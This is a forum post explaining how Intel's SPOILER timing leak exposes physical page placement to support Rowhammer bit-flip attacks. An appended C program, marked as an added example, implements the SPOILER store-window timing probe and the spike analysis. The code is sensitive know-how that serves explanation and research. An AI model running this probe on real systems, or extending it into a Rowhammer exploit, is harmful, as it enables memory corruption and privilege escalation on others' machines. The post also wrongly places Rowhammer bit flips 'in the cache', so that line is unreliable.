So, to those who skimmed it (or didn't read it):
They use SPOILER as a way to determine physical addresses by reading/writing virtual memory pages and seeing where the "spike" is, i.e. where the virtual page is sitting on two physical pages (which causes a longer read/write).
Using that information, they calculate where the physical pages are sitting.
Then, once they know that, they can use a DRAM attack called Double Sided Rowhammer.
That attack is meant to force row refreshes inside the same bank of the DRAM memory that contains said pages, in order to make rows inside the DRAM flip bits when the adjacent rows (on either side, hence double sided) around them get refreshed constantly, until memory bits in the unrefreshed row flip. That is a DRAM vulnerability, not an Intel-specific one, though.
That way, they basically force a change in memory, and if they do it in the right place, they can use that to extract information, gain access, etc.
Rowhammer was found in 2014. But it was hard to use, as it was hard to determine where the physical pages were inside the virtual space of an application.
Using SPOILER, though, they can "bypass" that issue and allow Rowhammer to do its dirty work.
It will be very hard for Intel to fix the issue because of how virtual memory and physical memory work. And it can't be fixed via firmware, if I'm right, because the issue of finding those physical page locations is inherent in the read/write of the virtual pages.
It is not like they can fix the "spike time" that reveals where the pages are, since reading two pages inside the memory will always take longer.
And once they can determine physical page locations, Rowhammer (or other physical memory exploits) can come back on the table.
To "fix" it, Intel will need to find a way to block Rowhammer from flipping bits in the cache, since they can't stop SPOILER. And that will require that when rows get refreshed, they must also start to refresh everything around them, and so on, and it will cause a chain reaction of heavy slowdown.
Why they couldn't make it happen on AMD or ARM is because they couldn't distinguish the little spikes in reads that say whether a virtual page was sitting on two physical pages.
Last edited by Defoler; 03-05-2019 at 09:02 AM.
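As an added example of the "spike" measurement the post describes (this is not code from the post or from the SPOILER authors), the block below has two parts: a SPOILER-style probe loop that issues a window of stores to consecutive pages at the same 4 KB offset and then times a load from the probe page, and the trace analysis that picks out the periodic spikes and reports their period. The published SPOILER mechanism is 1 MB aliasing of physical address bits 12-19, so on a vulnerable core the spikes recur every 256 pages; that period, the window size, the round count and the "2x median" spike threshold are all assumptions chosen here, and `sample_trace` is a constructed trace so the analysis can be exercised without the hardware. The timing loop only compiles on x86 (it uses `__rdtscp`); timing values are hardware-dependent and will not look like the constructed sample.

```c
/* Added example: SPOILER-style timing probe plus spike analysis.  Not the post's or the
 * SPOILER authors' code; constants and thresholds below are assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

#define PAGE_SIZE   4096u
#define WINDOW      64u    /* stores in flight before the timed load (assumption) */
#define ROUNDS      100u   /* repetitions averaged per probe page (assumption) */
#define ALIAS_PAGES 256u   /* 1 MB / 4 KB: pages sharing physical bits 12-19 */

#if defined(__x86_64__) || defined(__i386__)
/* Store to WINDOW pages following the probe page (same 4 KB offset), then time a load from
 * the probe page.  A load whose physical bits 12-19 match an in-flight store is stalled by
 * the memory disambiguation logic; that stall is the spike the post talks about. */
static uint32_t probe_page(volatile uint8_t *buf, size_t page)
{
    uint64_t total = 0;
    for (unsigned r = 0; r < ROUNDS; r++) {
        for (unsigned i = WINDOW; i > 0; i--)
            buf[(page + i) * PAGE_SIZE] = (uint8_t)r;
        unsigned aux;
        uint64_t t0 = __rdtscp(&aux);
        (void)buf[page * PAGE_SIZE];          /* volatile: the load is really issued */
        uint64_t t1 = __rdtscp(&aux);
        total += t1 - t0;
    }
    return (uint32_t)(total / ROUNDS);
}
#endif

static int cmp_u32(const void *a, const void *b)
{
    uint32_t x = *(const uint32_t *)a, y = *(const uint32_t *)b;
    return (x > y) - (x < y);
}

/* Median of the trace, used as the baseline latency. */
static uint32_t trace_median(const uint32_t *t, size_t n)
{
    uint32_t *copy = malloc(n * sizeof *copy);
    memcpy(copy, t, n * sizeof *copy);
    qsort(copy, n, sizeof *copy, cmp_u32);
    uint32_t m = copy[n / 2];
    free(copy);
    return m;
}

/* Report pages whose latency exceeds 2x the median (threshold is an assumption). */
static size_t find_spikes(const uint32_t *t, size_t n, size_t *out, size_t max_out)
{
    uint32_t threshold = 2 * trace_median(t, n);
    size_t k = 0;
    for (size_t p = 0; p < n && k < max_out; p++)
        if (t[p] > threshold)
            out[k++] = p;
    return k;
}

/* Smallest gap between consecutive spikes; ALIAS_PAGES if bits 12-19 aliasing is what
 * produced them.  Returns 0 when fewer than two spikes were found. */
static size_t spike_period(const size_t *idx, size_t k)
{
    size_t best = 0;
    for (size_t i = 1; i < k; i++) {
        size_t gap = idx[i] - idx[i - 1];
        if (best == 0 || gap < best)
            best = gap;
    }
    return best;
}

/* Constructed trace (not real measurements): ~40 cycle baseline with a spike every
 * ALIAS_PAGES pages starting at page 100, shaped like what a vulnerable core would show. */
static void sample_trace(uint32_t *t, size_t n)
{
    for (size_t i = 0; i < n; i++)
        t[i] = (i % ALIAS_PAGES == 100) ? 200 : 40 + (uint32_t)(i % 3);
}

int main(void)
{
    const size_t npages = 4096;                 /* 16 MB probed region (assumption) */
    uint32_t *trace = calloc(npages, sizeof *trace);
    size_t spikes[64];
#if defined(__x86_64__) || defined(__i386__)
    volatile uint8_t *buf = aligned_alloc(PAGE_SIZE, (npages + WINDOW + 1) * PAGE_SIZE);
    memset((void *)buf, 1, (npages + WINDOW + 1) * PAGE_SIZE);   /* back every page */
    for (size_t p = 0; p < npages; p++)
        trace[p] = probe_page(buf, p);
#else
    puts("no rdtscp on this architecture; analysing the constructed trace instead");
    sample_trace(trace, npages);
#endif
    size_t k = find_spikes(trace, npages, spikes, 64);
    size_t period = spike_period(spikes, k);
    printf("%zu spikes, median %u cycles, period %zu pages (%s)\n", k,
           trace_median(trace, npages), period,
           period == ALIAS_PAGES ? "1 MB aliasing, bits 12-19 leak" : "no clean 1 MB pattern");
    free(trace);
    return 0;
}
```

A spike period of exactly 256 pages means every spike page shares physical address bits 12-19 with the page the window was anchored on, which is the information the post says Rowhammer needed and could not get on its own. On a patched or non-Intel core the trace is expected to be flat and the analysis prints no clean pattern.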